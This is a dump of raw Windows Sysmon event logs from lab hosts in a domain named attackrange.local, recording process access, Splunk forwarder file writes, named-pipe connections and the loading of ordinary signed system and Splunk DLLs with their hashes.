19:17:31.470{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001094914Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:17:31.470{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001094913Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:31.112{761B69BB-8200-607D-A100-00000000BA01}4148NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=E21F5C2105D3482548EE1DCEAA8E3F18,SHA256=A62C5AB5FD16B72845400EE5338C4D5D0AC27884510730AA80A58BEA4A9B021E,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001605729Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.351{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001605728Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.351{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=98E4D629711A9E541EDC5F45BB97E696,SHA256=A71B1C2CAA326D726A704D105ECAC345D2DBBEADDB7AAECA4CDBF7BD3E733A40falsefalse - insufficient disk space 534500x80000000000000001605727Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:17:31.170{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe 734700x80000000000000001605726Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.170{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x80000000000000001605725Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.170{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x80000000000000001605724Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.170{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 11241100x80000000000000001605723Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.085{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001605722Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.085{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8745397D826ACF9C3B41BC2A9B5F61C4,SHA256=0E8DB349B5B388244272F9E78FF81ECDC934D724EF6CB8DED9C5CD6DFD8554A5falsefalse - insufficient disk space 734700x80000000000000001605721Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.054{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x80000000000000001605720Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.054{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.2969 (rs1_release.190503-1820)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=B6E99FD898E948657373BB02708C7C00,SHA256=90476029BD7AB0FEC53AAE567AE53BC0B09C7C5C8C7B8F19485BA872B74ED591trueMicrosoft WindowsValid 734700x80000000000000001605719Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.054{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 
(rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x80000000000000001605718Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:17:31.054{21761711-7A4B-6080-BD60-00000000BB01}4884\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe 734700x80000000000000001605717Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.054{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x80000000000000001605716Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:17:31.054{21761711-7A4B-6080-BD60-00000000BB01}4884\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe 734700x80000000000000001605715Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.054{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=51F4F9025E6D236F5BF2C24C09E42C8E,SHA256=AE196933C3E292680C83B09F24CE9E6D498E34ECDD30ACB8C1544EEB4705F285trueMicrosoft WindowsValid 734700x80000000000000001605714Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.054{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x80000000000000001605713Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.054{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x80000000000000001605712Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.054{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x80000000000000001605711Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.054{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 
734700x80000000000000001605710Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.054{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x80000000000000001605709Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.054{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x80000000000000001605708Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.054{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4225 (rs1_release.210127-1811)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=BB3CFF02CD7B7C5704A3E8C77DC0C199,SHA256=016E4F1366708D0F7AD7017CDFCACBDC770C972B63E579EE9A20A98CD3301931trueMicrosoft WindowsValid 734700x80000000000000001605707Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.054{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft 
Corporationbcryptprimitives.dllMD5=E92A3F429653A81E4C53A0B474A817A5,SHA256=4ECAFDB8F0F20BFFC1A5516882FD59C961DEACC2B01F669ABF1D1895F6F90A55trueMicrosoft WindowsValid 734700x80000000000000001605706Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.054{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\combase.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=88632FDECDE467B887C3594BE2EC545C,SHA256=FFED4D80961917C785063411ED15CED1DB6588AD925E76D72E1BF684FFDBF25DtrueMicrosoft WindowsValid 734700x80000000000000001605705Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.053{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x80000000000000001605704Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.053{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x80000000000000001605703Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.053{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program 
Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x80000000000000001605702Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.053{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x80000000000000001605701Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.053{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.4350 (rs1_release.210407-2154)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F9FE858A976B6D38FD5CEA46019B246A,SHA256=37F7417D0AA2A15121A14CF176F0C4A1B6BB01E290324CCA0DDB001F47E8C458trueMicrosoft WindowsValid 734700x80000000000000001605700Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.053{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x80000000000000001605699Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.053{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program 
Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x80000000000000001605698Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.053{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x80000000000000001605697Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.053{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x80000000000000001605696Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.052{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x80000000000000001605695Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.052{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft 
Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x80000000000000001605694Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.052{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x80000000000000001605693Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.052{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x80000000000000001605692Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.052{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x80000000000000001605691Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.052{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 
librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x80000000000000001605690Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.052{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x80000000000000001605689Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.052{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\nsi.dll10.0.14393.3297 (rs1_release_1.191001-1045)NSI User-mode interface DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationnsi.dllMD5=994E2A6D2A0B38E0968B3998E42033AC,SHA256=491F2D1DE09C39B324BCF5800198AC7CCE755F4023F1FEB3854D33716461BC27trueMicrosoft WindowsValid 734700x80000000000000001605688Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.051{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x80000000000000001605687Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.051{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 
(rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x80000000000000001605686Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.051{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728BtrueMicrosoft WindowsValid 734700x80000000000000001605685Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.051{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dnsapi.dll10.0.14393.4350 (rs1_release.210407-2154)DNS Client API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationdnsapiMD5=D7651F99299B13D576A72643BFC44944,SHA256=589302E630C473DBDF4CE92C59F00B029FCA0C228E7111A764166E16025FA1A9trueMicrosoft WindowsValid 734700x80000000000000001605684Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.051{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5trueMicrosoft WindowsValid 734700x80000000000000001605683Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.051{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\advapi32.dll10.0.14393.2969 (rs1_release.190503-1820)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=F5442C4B9A99C3AED71BED79AC46DAD1,SHA256=05F47403F3BD93FB11F39A5CB4D6E4DD08B35FF4FA3D4969D8E5396D38FB484BtrueMicrosoft WindowsValid 734700x80000000000000001605682Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.050{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4350 (rs1_release.210407-2154)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=BC930981DA6E598A6A2E87D8355CB38A,SHA256=34DB9A305C0574B5C1694A499221B520DFB2BFD894D8E95096ABF09F1182D758trueMicrosoft WindowsValid 734700x80000000000000001605681Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.050{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x80000000000000001605680Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.050{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft 